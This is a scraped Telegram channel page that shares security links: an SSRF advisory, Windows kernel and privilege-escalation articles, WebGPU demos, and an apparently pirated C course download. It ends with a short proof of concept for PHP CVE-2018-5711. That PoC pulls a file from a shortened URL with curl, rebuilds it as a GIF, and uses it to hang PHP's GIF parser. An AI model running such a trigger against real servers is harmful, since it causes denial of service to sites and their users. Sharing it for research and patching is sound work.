HackerOne – Telegram
HackerOne
11K subscribers
644 photos
31 videos
79 files
2.74K links
Community : @Sec0x01
@Bug0x
Download Telegram
Google Forms (WordPress plugin) SSRF vulnerability
https://klikki.fi/adv/wpgform.html
🖕
Topic this course will cover:
Reviewing the C language and the C11 standard
Understanding the development cycle
Setting values
Writing statements and expressions
Adding comments to code for clarity
Declaring data types
Manipulating strings
Declaring variables
Using operators and expressions
Working with functions
Controlling flow with if-else statements and loops
Initializing arrays
Working with files
Including files and executing macros with the C preprocessor
Understanding best coding practices

Course overview:
Course provider: Lynda
Platform: Windows/*Nix
Skill level required: Beginner
Duration: ~7.5 Hours

Download overview:
Name: C-Essential-Training
Total size: ~732.9 MB
Contains: 19 folders and 101 files (Including exercise file)
Here are a collection of simple WebGPU examples.

https://webkit.org/demos/webgpu/
Inside the windows vista kernel - 3 part
https://technet.microsoft.com/en-us/library/cc162494.aspx
Analyzing local privilege escalations in win32k
http://uninformed.org/?v=10&a=2&t=sumry
Infinite loop PHP with gif

http://blog.orange.tw/2018/01/php-cve-2018-5711-hanging-websites-by.html

PoC:

$ curl -L https://git.io/vN0n4 | xxd -r > poc.gif
$ php -r 'imagecreatefromgif("poc.gif");'